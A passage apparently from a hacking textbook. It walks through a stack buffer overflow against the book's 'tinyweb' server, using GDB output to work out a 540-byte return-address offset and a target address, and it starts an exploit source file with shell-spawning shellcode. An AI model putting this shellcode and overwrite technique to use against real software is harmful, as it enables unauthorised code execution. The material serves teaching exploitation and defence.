$1 = 540
(gdb) p /x 0xbffff5c0 + 200
$2 = 0xbffff688
(gdb) quit
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
reader@hacking:~/booksrc $
At the breakpoint, the request buffer begins at 0xbffff5c0 . The bt com-
mand's stack backtrace shows that the return address from handle_connection()
is 0x08048cf6 . Since we know how the local variables are generally laid out on
the stack, we know the request buffer is near the end of the frame. This means
that the stored return address should be on the stack somewhere near the
end of this 500-byte buffer. Since we already know the general area to look, a
quick inspection shows the stored return address is at 0xbffff7dc . A little
math shows the stored return address is 540 bytes from the start of the request
buffer. However, there are a few bytes near the beginning of the buffer that
might be mangled by the rest of the function. Remember, we don't gain
control of the program until the function returns. To account for this, it's
best to just avoid the beginning of the buffer. Skipping the first 200 bytes
should be safe, while leaving plenty of space for shellcode in the remaining
300 bytes. This means 0xbffff688 is the target return address.
Almost Only Counts with Hand Grenades
The following exploit for the tinyweb program uses the offset and return
address overwrite values calculated with GDB. It fills the exploit buffer with
null bytes, so anything written into it will automatically be null-terminated.
Then it fills the first 540 bytes with NOP instructions. This builds the NOP
sled and fills the buffer up to the return address overwrite location. Then
the entire string is terminated with the '\r\n' line terminator.
tinyweb_exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "hacking.h"
#include "hacking-network.h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540